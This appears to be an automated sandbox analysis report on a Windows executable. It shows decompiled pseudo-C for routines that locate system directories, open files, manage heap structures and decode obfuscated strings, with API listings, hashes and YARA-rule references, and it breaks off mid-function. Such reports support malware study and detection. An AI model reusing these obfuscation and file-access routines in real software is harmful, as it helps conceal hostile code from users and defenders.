                                        • HeapDestroy.KERNEL32(00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417060,00000008,0000000C,000186A1,00000007,00417070,004180F0,00000004), ref: 004011C6
                                        • ExitProcess.KERNEL32(00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417060,00000008,0000000C,000186A1,00000007,00417070,004180F0,00000004), ref: 004011CB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Heap$Allocate$Free$CreateInitializememset$CriticalErrorHandleLastLibrarySectionValue$AllocC38420ConsoleCtrlDestroyEnumExitHandlerLoadModuleProcessResourceTypes
                                        • String ID: *pA$6pA$xpA
                                        • API String ID: 2562614242-3011280366
                                        • Opcode ID: ad11ab6fb60a766006d696733ac3bd588fa51db3ed7c78d65088634b8273192e
                                        • Instruction ID: acd0461229ddfa8034a924b42fd210622d11440284541f7a7559834ad17ee905
                                        • Opcode Fuzzy Hash: ad11ab6fb60a766006d696733ac3bd588fa51db3ed7c78d65088634b8273192e
                                        • Instruction Fuzzy Hash: 18314171684709A9E110B7B39C43F9E3A189F1870CF51893FB644790E3DEBC55588A6F
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403221, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 78%
                                        			E00403221(void* __edi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				WCHAR* _v16;
				WCHAR* _v24;
				WCHAR* _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _t43;
				void* _t45;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t56;
				void* _t62;
				void* _t69;
				void* _t75;
				void* _t80;
				void* _t90;
				void* _t106;
				intOrPtr _t108;
				void* _t109;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t117;
				void* _t120;
				void* _t123;
				intOrPtr _t125;
				void* _t126;
				void* _t128;
				void* _t129;
				void* _t130;

				_t129 = __ebp;
				_t128 = __edi;
				_t106 = 7;
				do {
					_t130 = _t130 - 4;
					_v8 = 0;
					_t106 = _t106 - 1;
				} while (_t106 != 0);
				E004051A0(E0040E600(), _a36);
				E00405060(_t130, _a24);
				_t108 = _a28;
				E00405060( &_v8, _t108);
				if(E00402B6D() == 0 || E00405573() == 0x41) {
					_t43 = 0;
				} else {
					_t43 = 1;
				}
				if(_t43 == 0) {
					_t45 = E0040E4C0();
					_t109 = _t108;
					_push(_t45);
					E00406260(_t128, 0x800, E0040E4C0());
					E0040E500( &_v8, _t109);
					GetSystemDirectoryW(_v16, 0x800);
					PathAddBackslashW(_v16);
				} else {
					_t62 = E0040E4C0();
					_t114 = _t108;
					_push(_t62);
					E00406260(_t128, 0x800, E0040E4C0());
					E0040E500( &_v8, _t114); // executed
					GetWindowsDirectoryW(_v16, 0x800);
					PathAddBackslashW(_v16);
					_push(_v16);
					_t69 = E0040E4C0();
					_pop(_t117);
					E0040E660(_t117);
					E0040E660(L"sysnative");
					E0040E500( &_v24, _t69);
					PathAddBackslashW(_v32);
					_push(_v32);
					_t75 = E0040E4C0();
					_pop(_t120);
					E0040E660(_t120);
					E0040E660(_v44);
					E0040E500( &_v36, _t75);
					_push(_v48);
					_t80 = E0040E4C0();
					_pop(_t123);
					E0040E660(_t123);
					E0040E660(_v60);
					_t125 = _v60;
					E0040E660(_t125);
					E0040E500( &_v52, _t80);
					_push(_v64);
					if(E0040B3E0(_t129, 0) == 0) {
						_a8 = 0;
					} else {
						_a8 = 1;
						E0040AFF0(0);
					}
					_push(_a4);
					if(E0040B3E0(_t129, 0) == 0) {
						_a8 = 0;
					} else {
						_a8 = 1;
						E0040AFF0(0);
					}
					if(_a4 + _a8 == 0) {
						_t90 = E0040E4C0();
						_t126 = _t125;
						_push(_t90);
						E00406260(_t128, 0x800, E0040E4C0());
						E0040E500( &_v16, _t126);
						GetSystemDirectoryW(_v24, 0x800);
						PathAddBackslashW(_v24);
					}
				}
				_push(_v0);
				_t52 = E0040E4C0();
				_pop(_t112);
				E0040E660(_t112);
				_t54 = _t52;
				_t55 = E00405170();
				_t113 = _t54;
				_t56 = _t55 + _t113;
				return E0040E590(E0040E590(E0040E590(E0040E590(E0040E590(_t56, _a8), _v12), _v12), _v12), _v12);
			}








































                                        0x00403221
                                        0x00403221
                                        0x00403222
                                        0x00403227
                                        0x00403227
                                        0x0040322a
                                        0x00403231
                                        0x00403231
                                        0x0040323d
                                        0x00403249
                                        0x0040324e
                                        0x00403256
                                        0x00403262
                                        0x00403277
                                        0x00403270
                                        0x00403270
                                        0x00403270
                                        0x0040327b
                                        0x004033e8
                                        0x004033ed
                                        0x004033ee
                                        0x004033fc
                                        0x00403406
                                        0x00403414
                                        0x0040341d
                                        0x00403281
                                        0x00403282
                                        0x00403287
                                        0x00403288
                                        0x00403296
                                        0x004032a0
                                        0x004032ae
                                        0x004032b7
                                        0x004032c0
                                        0x004032c1
                                        0x004032c6
                                        0x004032c9
                                        0x004032d4
                                        0x004032de
                                        0x004032e7
                                        0x004032f0
                                        0x004032f1
                                        0x004032f6
                                        0x004032f9
                                        0x00403303
                                        0x0040330d
                                        0x00403316
                                        0x00403317
                                        0x0040331c
                                        0x0040331f
                                        0x00403329
                                        0x0040332e
                                        0x00403333
                                        0x0040333d
                                        0x00403342
                                        0x00403352
                                        0x00403368
                                        0x00403354
                                        0x00403354
                                        0x00403361
                                        0x00403361
                                        0x00403370
                                        0x00403380
                                        0x00403396
                                        0x00403382
                                        0x00403382
                                        0x0040338f
                                        0x0040338f
                                        0x004033a8
                                        0x004033ab
                                        0x004033b0
                                        0x004033b1
                                        0x004033bf
                                        0x004033c9
                                        0x004033d7
                                        0x004033e0
                                        0x004033e0
                                        0x004033e5
                                        0x00403426
                                        0x00403427
                                        0x0040342c
                                        0x0040342f
                                        0x00403434
                                        0x00403436
                                        0x0040343b
                                        0x0040343c
                                        0x0040347a

                                        APIs
                                        • GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032AE
                                        • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032B7
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 004033D7
                                        • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004033E0
                                          • Part of subcall function 0040E500: RtlReAllocateHeap.NTDLL(022F0000,00000000,?,?), ref: 0040E55C
                                        • PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032E7
                                          • Part of subcall function 0040E4C0: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E4C6
                                          • Part of subcall function 0040E4C0: TlsGetValue.KERNEL32(0000001B), ref: 0040E4D5
                                          • Part of subcall function 0040E4C0: SetLastError.KERNEL32(?), ref: 0040E4EB
                                          • Part of subcall function 0040E500: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040E50C
                                          • Part of subcall function 0040E500: RtlAllocateHeap.NTDLL(022F0000,00000000,?), ref: 0040E539
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403414
                                        • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040341D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
                                        • String ID: sysnative
                                        • API String ID: 3406704365-821172135
                                        • Opcode ID: b669bfd660540013482964eea79af57da4e66b72f407bdbdd15962aa75341653
                                        • Instruction ID: 63ed7e2836bb39e51b1b0fa7ad1fe9c838676d48128987c89443e7ba8f4c60f6
                                        • Opcode Fuzzy Hash: b669bfd660540013482964eea79af57da4e66b72f407bdbdd15962aa75341653
                                        • Instruction Fuzzy Hash: 3A514A75118301BAD640BB73DC82F2F6AA8AF8070CF20CD3EB144760D2DA7DD9655A6E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B0E0, Relevance: 9.2, APIs: 6, Instructions: 157filememoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 96%
                                        			E0040B0E0(WCHAR* _a4, intOrPtr _a8, long _a12, signed int _a16) {
				void* _v0;
				long _v8;
				intOrPtr _v12;
				intOrPtr _t49;
				void* _t50;
				long _t52;
				long _t53;
				long _t61;
				void* _t62;
				long _t64;
				long _t66;
				void* _t67;
				signed int _t68;
				signed int _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t68 = _a16;
				_t73 = 0;
				_t70 = _t68 & 0x0000001f;
				_v8 = _t70;
				if(_t70 == 0) {
					_v8 = 2;
				}
				_push(_a4);
				_t72 = E0040DAB8( *0x418784);
				if(_t72 == 0) {
					L40:
					return _t73;
				} else {
					_t49 = _a8;
					if(_t49 != 1) {
						if(_t49 != 2) {
							if(_t49 != 3) {
								_t71 = _a12;
								goto L23;
							} else {
								_t61 = 0;
								_a12 = 0;
								if((_t68 & 0x00020000) != 0) {
									_t61 = 1;
									_a12 = 1;
								}
								if((_t68 & 0x00040000) != 0) {
									_t61 = _t61 | 0x00000007;
									_a12 = _t61;
								}
								_t62 = CreateFileW(_a4, 0xc0000000, _t61, 0, 2, 0x80, 0); // executed
								_t71 = _t62;
								if(_t71 != 0xffffffff) {
									goto L24;
								} else {
									_t71 = CreateFileW(_a4, 0x40000000, _a12, 0, 5, 0, 0);
									goto L23;
								}
							}
						} else {
							_t64 = 0;
							if((_t68 & 0x00020000) != 0) {
								_t64 = 1;
							}
							if((_t68 & 0x00040000) != 0) {
								_t64 = _t64 | 0x00000007;
							}
							_t71 = CreateFileW(_a4, 0xc0000000, _t64, 0, 4, 0x80, 0);
							goto L23;
						}
					} else {
						_t66 = 0;
						if((_t68 & 0x00020000) != 0) {
							_t66 = 1;
						}
						if((_t68 & 0x00040000) != 0) {
							_t66 = _t66 | 0x00000007;
						}
						_t67 = CreateFileW(_a4, 0x80000000, _t66, 0, 3, 0x80, 0); // executed
						_t71 = _t67;
						L23:
						if(_t71 == 0xffffffff) {
							L36:
							_t50 = _v0;
							goto L37;
						} else {
							L24:
							if(_t71 == 0) {
								goto L36;
							} else {
								_t52 =  *0x417120; // 0x1000
								if(_t52 == 0 || (_t68 & 0x00080000) != 0) {
									 *(_t72 + 4) = _t73;
								} else {
									 *(_t72 + 4) = RtlAllocateHeap( *0x418068, 0, _t52);
								}
								 *_t72 = _t71;
								_t53 =  *0x417120; // 0x1000
								 *(_t72 + 8) = _t53;
								 *((intOrPtr*)(_t72 + 0x18)) = _v12;
								 *(_t72 + 0xc) = _t73;
								 *(_t72 + 0x14) = 1;
								 *(_t72 + 0x1c) = 0 | _a8 == 0x00000001;
								if(_a8 == 2 && (_t68 & 0x00100000) != 0) {
									_v8 = _t73;
									SetFilePointer(_t71, 0,  &_v8, 2);
								}
								_t50 = _v0;
								_t73 = _t72;
								if(_t50 != 0xffffffff) {
									_t73 = _t71;
								}
								if(_t73 == 0) {
									L37:
									if(_t50 != 0xffffffff) {
										_t72 = _t50;
									}
									_push(_t72);
									E0040DA2A( *0x418784);
									goto L40;
								} else {
									return _t73;
								}
							}
						}
					}
				}
			}




















                                        0x0040b0e4
                                        0x0040b0ed
                                        0x0040b0ef
                                        0x0040b0f2
                                        0x0040b0f6
                                        0x0040b0f8
                                        0x0040b0f8
                                        0x0040b100
                                        0x0040b10f
                                        0x0040b113
                                        0x0040b2c4
                                        0x0040b2cb
                                        0x0040b119
                                        0x0040b119
                                        0x0040b120
                                        0x0040b161
                                        0x0040b19f
                                        0x0040b208
                                        0x00000000
                                        0x0040b1a1
                                        0x0040b1a1
                                        0x0040b1a3
                                        0x0040b1ad
                                        0x0040b1af
                                        0x0040b1b4
                                        0x0040b1b4
                                        0x0040b1be
                                        0x0040b1c0
                                        0x0040b1c3
                                        0x0040b1c3
                                        0x0040b1dc
                                        0x0040b1e2
                                        0x0040b1e7
                                        0x00000000
                                        0x0040b1e9
                                        0x0040b204
                                        0x00000000
                                        0x0040b204
                                        0x0040b1e7
                                        0x0040b163
                                        0x0040b163
                                        0x0040b16b
                                        0x0040b16d
                                        0x0040b16d
                                        0x0040b178
                                        0x0040b17a
                                        0x0040b17a
                                        0x0040b198
                                        0x00000000
                                        0x0040b198
                                        0x0040b122
                                        0x0040b122
                                        0x0040b12a
                                        0x0040b12c
                                        0x0040b12c
                                        0x0040b137
                                        0x0040b139
                                        0x0040b139
                                        0x0040b151
                                        0x0040b157
                                        0x0040b20c
                                        0x0040b20f
                                        0x0040b2ab
                                        0x0040b2ab
                                        0x00000000
                                        0x0040b215
                                        0x0040b215
                                        0x0040b217
                                        0x00000000
                                        0x0040b21d
                                        0x0040b21d
                                        0x0040b224
                                        0x0040b242
                                        0x0040b22e
                                        0x0040b23d
                                        0x0040b23d
                                        0x0040b245
                                        0x0040b247
                                        0x0040b24c
                                        0x0040b253
                                        0x0040b25d
                                        0x0040b263
                                        0x0040b26f
                                        0x0040b272
                                        0x0040b282
                                        0x0040b28a
                                        0x0040b28a
                                        0x0040b290
                                        0x0040b294
                                        0x0040b299
                                        0x0040b29b
                                        0x0040b29b
                                        0x0040b29f
                                        0x0040b2af
                                        0x0040b2b2
                                        0x0040b2b4
                                        0x0040b2b4
                                        0x0040b2b6
                                        0x0040b2bd
                                        0x00000000
                                        0x0040b2a3
                                        0x0040b2aa
                                        0x0040b2aa
                                        0x0040b29f
                                        0x0040b217
                                        0x0040b20f
                                        0x0040b120

                                        APIs
                                        • CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000001,00000000), ref: 0040B151
                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000001,00000000), ref: 0040B192
                                        • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000001,00000000), ref: 0040B1DC
                                        • CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000001,00000000), ref: 0040B1FE
                                        • RtlAllocateHeap.KERNEL32(00000000,00001000,?,?,?,?,00000001,00000000), ref: 0040B237
                                        • SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040B28A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: File$Create$AllocateHeapPointer
                                        • String ID:
                                        • API String ID: 1439325152-0
                                        • Opcode ID: efa8611414e17ec9e601aaa6b9741683d7f657330ed4175281d5ac13c646ff7d
                                        • Instruction ID: 3aae44d95ee81e95c5663e6fc6785f81f81e0736679735ea9aefc8d625b6cb05
                                        • Opcode Fuzzy Hash: efa8611414e17ec9e601aaa6b9741683d7f657330ed4175281d5ac13c646ff7d
                                        • Instruction Fuzzy Hash: 7451C371244300ABD3208E14DC48B6B7BE5EB84764F244A3EF995B63E0D779E8458B8D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040DE39, Relevance: 7.6, APIs: 5, Instructions: 106memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 46%
                                        			E0040DE39(signed int _a4, signed char _a16) {
				intOrPtr _v0;
				signed char _v4;
				signed char _t32;
				void* _t33;
				intOrPtr* _t43;
				intOrPtr _t50;
				signed int _t52;
				void* _t53;
				signed int _t55;
				signed int _t57;
				intOrPtr* _t58;
				void* _t59;
				signed int _t61;

				_t32 = _a16;
				_t53 = 4;
				_t52 = _a4 + _t53;
				_t57 = _t32 & 0x00000003;
				_t59 = 0;
				_t55 = _t52 & 0x00000003;
				if(_t55 != 0) {
					_t52 = _t52 + _t53;
				}
				if((_t32 & 0x00000004) == 0) {
					_t33 = RtlAllocateHeap( *0x418068, 0, 0x38); // executed
					_t59 = _t33;
					if(_t59 != 0) {
						 *((intOrPtr*)(_t59 + 0x14)) = _v0;
						 *((intOrPtr*)(_t59 + 0x18)) = _a4;
						 *_t59 = 0;
						 *((intOrPtr*)(_t59 + 4)) = 0;
						 *((intOrPtr*)(_t59 + 8)) = 0;
						 *(_t59 + 0x10) = _t52;
						if(_t57 == 1 || _t57 == 0) {
							 *((intOrPtr*)(_t59 + 0x1c)) = 1;
							_t31 = _t59 + 0x20; // 0x20
							 *0x417518(_t31);
						} else {
							 *((intOrPtr*)(_t59 + 0x1c)) = 0;
						}
					}
					goto L21;
				} else {
					E0040E063(_t53, 0x41867c, E0040E002);
					 *0x41750c(0x418684);
					_t43 =  *0x418680; // 0x2160fa8
					_t61 = _a4;
					while(_t43 != 0) {
						if( *((intOrPtr*)(_t43 + 0xc)) != _t52 ||  *((intOrPtr*)(_t43 + 0x10)) != _t61) {
							_t43 =  *_t43;
							continue;
						} else {
							 *((intOrPtr*)(_t43 + 0x14)) =  *((intOrPtr*)(_t43 + 0x14)) + 1;
							_t59 =  *(_t43 + 8);
							if(_t59 != 0) {
								L15:
								 *0x417514(0x418684);
								L21:
								return _t59;
							}
							L10:
							_t58 = RtlAllocateHeap( *0x418068, 0, 0x18);
							if(_t58 != 0) {
								_t12 = _t52 - 4; // -4
								_t59 = E0040DE39(_t12, _v4, _v0, _t61 & 0xfffffffb);
								if(_t59 != 0) {
									_t50 =  *0x418680; // 0x2160fa8
									 *((intOrPtr*)(_t59 + 8)) = _t58;
									 *(_t58 + 4) =  *(_t58 + 4) & 0x00000000;
									 *(_t58 + 8) = _t59;
									 *(_t58 + 0xc) = _t52;
									 *(_t58 + 0x10) = _t61;
									 *((intOrPtr*)(_t58 + 0x14)) = 1;
									 *_t58 = _t50;
									if(_t50 != 0) {
										 *((intOrPtr*)(_t50 + 4)) = _t58;
									}
									 *0x418680 = _t58;
								}
							}
							goto L15;
						}
					}
					goto L10;
				}
			}
















                                        0x0040de39
                                        0x0040de47
                                        0x0040de48
                                        0x0040de50
                                        0x0040de53
                                        0x0040de55
                                        0x0040de58
                                        0x0040de5c
                                        0x0040de5c
                                        0x0040de60
                                        0x0040df1b
                                        0x0040df21
                                        0x0040df25
                                        0x0040df2b
                                        0x0040df32
                                        0x0040df38
                                        0x0040df3a
                                        0x0040df3d
                                        0x0040df40
                                        0x0040df45
                                        0x0040df50
                                        0x0040df53
                                        0x0040df57
                                        0x0040df4b
                                        0x0040df4b
                                        0x0040df4b
                                        0x0040df45
                                        0x00000000
                                        0x0040de66
                                        0x0040de70
                                        0x0040de7a
                                        0x0040de80
                                        0x0040de85
                                        0x0040de97
                                        0x0040de8e
                                        0x0040de95
                                        0x00000000
                                        0x0040de9d
                                        0x0040de9d
                                        0x0040dea0
                                        0x0040dea5
                                        0x0040df05
                                        0x0040df0a
                                        0x0040df5e
                                        0x0040df63
                                        0x0040df63
                                        0x0040dea7
                                        0x0040deb7
                                        0x0040debb
                                        0x0040dec7
                                        0x0040ded4
                                        0x0040ded8
                                        0x0040deda
                                        0x0040dedf
                                        0x0040dee2
                                        0x0040dee6
                                        0x0040dee9
                                        0x0040deec
                                        0x0040deef
                                        0x0040def6
                                        0x0040defa
                                        0x0040defc
                                        0x0040defc
                                        0x0040deff
                                        0x0040deff
                                        0x0040ded8
                                        0x00000000
                                        0x0040debb
                                        0x0040de8e
                                        0x00000000
                                        0x0040de9b

                                        APIs
                                        • RtlEnterCriticalSection.KERNEL32(00418684,0041867C,0040E002,00000000,FFFFFFED,00000200,772E4620,0040A496,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040DE7A
                                        • RtlAllocateHeap.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040DEB1
                                        • RtlLeaveCriticalSection.KERNEL32(00418684,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DF0A
                                        • RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,772E4620,0040A496,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040DF1B
                                        • RtlInitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DF57
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CriticalSection$AllocateHeap$EnterInitializeLeave
                                        • String ID:
                                        • API String ID: 2823868979-0
                                        • Opcode ID: 24264039b54de44228afaa42ce564739f9fd6de7d042b157153aa48eacd2c85d
                                        • Instruction ID: a774a48229e4ca94ced33288216cec9e3a791dfae6a3fd6d0c8a76dfdebbb98f
                                        • Opcode Fuzzy Hash: 24264039b54de44228afaa42ce564739f9fd6de7d042b157153aa48eacd2c85d
                                        • Instruction Fuzzy Hash: BB31C071940B069FC3208F99D844A56FBF0FB44710B1AC53EF559A77A0DB78E908CB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403F53, Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 571COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 75%
                                        			E00403F53(void* __ecx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, void* _a16, intOrPtr _a20, intOrPtr _a24, void* _a32, intOrPtr _a36, void* _a40, void* _a48) {
				char _v0;
				signed int _v4;
				int _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v48;
				intOrPtr _v56;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v84;
				intOrPtr _v100;
				intOrPtr _v108;
				char _v120;
				intOrPtr _v128;
				intOrPtr _v144;
				void* __ebx;
				void* _t103;
				void* _t108;
				void* _t114;
				void* _t115;
				void* _t116;
				void* _t117;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t126;
				void* _t133;
				void* _t138;
				void* _t139;
				void* _t140;
				void* _t146;
				void* _t147;
				void* _t153;
				void* _t159;
				char* _t181;
				void* _t183;
				void* _t184;
				void* _t188;
				char* _t193;
				void* _t195;
				void* _t196;
				void* _t200;
				char* _t205;
				void* _t207;
				void* _t208;
				void* _t212;
				char* _t217;
				void* _t219;
				void* _t220;
				void* _t224;
				char* _t229;
				void* _t231;
				void* _t232;
				void* _t236;
				char* _t241;
				void* _t243;
				void* _t244;
				void* _t248;
				char* _t253;
				void* _t255;
				void* _t256;
				void* _t260;
				char* _t265;
				void* _t267;
				void* _t268;
				void* _t272;
				char* _t277;
				void* _t279;
				void* _t280;
				void* _t284;
				intOrPtr _t291;
				void* _t310;
				char _t311;
				intOrPtr _t312;
				void* _t313;
				intOrPtr _t314;
				void* _t315;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t319;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;
				char _t324;
				void* _t325;
				void* _t326;
				void* _t327;
				intOrPtr _t328;
				void* _t329;
				intOrPtr _t330;
				void* _t331;
				void* _t332;
				intOrPtr _t334;
				void* _t335;
				void* _t336;
				intOrPtr _t338;
				void* _t339;
				void* _t340;
				intOrPtr _t342;
				void* _t343;
				void* _t344;
				intOrPtr _t346;
				void* _t347;
				void* _t348;
				void* _t351;
				void* _t352;
				void* _t355;
				void* _t356;
				void* _t359;
				void* _t360;
				void* _t363;
				void* _t364;
				void* _t367;
				void* _t368;
				void* _t369;
				void* _t370;
				intOrPtr* _t371;

				_t370 = __ebp;
				_t369 = __esi;
				_t368 = __edi;
				_t310 = __ecx;
				_t311 = 0xe;
				do {
					_t371 = _t371 - 4;
					_v8 = 0;
					_t311 = _t311 - 1;
				} while (_t311 != 0);
				E0040E600();
				 *0x41808c = 0x41708e;
				_v8 = 0;
				while(1) {
					_t374 = 0x19 - _v8;
					if(0x19 < _v8) {
						break;
					}
					_t277 =  *0x41808c; // 0x41708e
					_v4 =  *_t277;
					 *0x41808c =  *0x41808c + 1;
					_t279 = E0040E4C0();
					_t364 = _t311;
					_push(_t279);
					_push(_t364);
					_t280 = E0040E4C0();
					E00405D60(_t374, _v4 * 0xffffffff);
					E0040E500( &_v8, _t280);
					_push(_v12);
					_t284 = E0040E4C0();
					_pop(_t367);
					E0040E660(_t367);
					_t311 = _v20;
					E0040E660(_t311);
					E0040E500( &_v20, _t284);
					 *_t371 =  *_t371 + 1;
					if( *_t371 >= 0) {
						continue;
					}
					break;
				}
				 *0x41808c = 0x4170f2;
				_v8 = 0;
				while(1) {
					_t376 = 2 - _v8;
					if(2 < _v8) {
						break;
					}
					_t265 =  *0x41808c; // 0x41708e
					_v4 =  *_t265;
					 *0x41808c =  *0x41808c + 1;
					_t267 = E0040E4C0();
					_t360 = _t311;
					_push(_t267);
					_push(_t360);
					_t268 = E0040E4C0();
					E00405D60(_t376, _v4 * 0xffffffff);
					E0040E500( &_v8, _t268);
					_push(_v8);
					_t272 = E0040E4C0();
					_pop(_t363);
					E0040E660(_t363);
					_t311 = _v20;
					E0040E660(_t311);
					E0040E500( &_v16, _t272);
					 *_t371 =  *_t371 + 1;
					if( *_t371 >= 0) {
						continue;
					}
					break;
				}
				 *0x41808c = 0x4170f7;
				_v8 = 0;
				while(1) {
					_t378 = 3 - _v8;
					if(3 < _v8) {
						break;
					}
					_t253 =  *0x41808c; // 0x41708e
					_v4 =  *_t253;
					 *0x41808c =  *0x41808c + 1;
					_t255 = E0040E4C0();
					_t356 = _t311;
					_push(_t255);
					_push(_t356);
					_t256 = E0040E4C0();
					E00405D60(_t378, _v4 * 0xffffffff);
					E0040E500( &_v8, _t256);
					_push(_v4);
					_t260 = E0040E4C0();
					_pop(_t359);
					E0040E660(_t359);
					_t311 = _v20;
					E0040E660(_t311);
					E0040E500( &_v12, _t260);
					 *_t371 =  *_t371 + 1;
					if( *_t371 >= 0) {
						continue;
					}
					break;
				}
				 *0x41808c = 0x4170f5;
				_v8 = 0;
				while(1) {
					_t380 = 1 - _v8;
					if(1 < _v8) {
						break;
					}
					_t241 =  *0x41808c; // 0x41708e
					_v4 =  *_t241;
					 *0x41808c =  *0x41808c + 1;
					_t243 = E0040E4C0();
					_t352 = _t311;
					_push(_t243);
					_push(_t352);
					_t244 = E0040E4C0();
					E00405D60(_t380, _v4 * 0xffffffff);
					E0040E500( &_v8, _t244);
					_push(_v0);
					_t248 = E0040E4C0();
					_pop(_t355);
					E0040E660(_t355);
					_t311 = _v20;
					E0040E660(_t311);
					E0040E500( &_v8, _t248);
					 *_t371 =  *_t371 + 1;
					if( *_t371 >= 0) {
						continue;
					}
					break;
				}
				 *0x41808c = 0x4170cb;
				_v8 = 0;
				while(1) {
					_t382 = 0xd - _v8;
					if(0xd < _v8) {
						break;
					}
					_t229 =  *0x41808c; // 0x41708e
					_v4 =  *_t229;
					 *0x41808c =  *0x41808c + 1;
					_t231 = E0040E4C0();
					_t348 = _t311;
					_push(_t231);
					_push(_t348);
					_t232 = E0040E4C0();
					E00405D60(_t382, _v4 * 0xffffffff);
					E0040E500( &_v8, _t232);
					_push(_a4);
					_t236 = E0040E4C0();
					_pop(_t351);
					E0040E660(_t351);
					_t311 = _v20;
					E0040E660(_t311);
					E0040E500( &_v4, _t236);
					 *_t371 =  *_t371 + 1;
					if( *_t371 >= 0) {
						continue;
					}
					break;
				}
				 *0x41808c = 0x4170d9;
				_v8 = 0;
				while(1) {
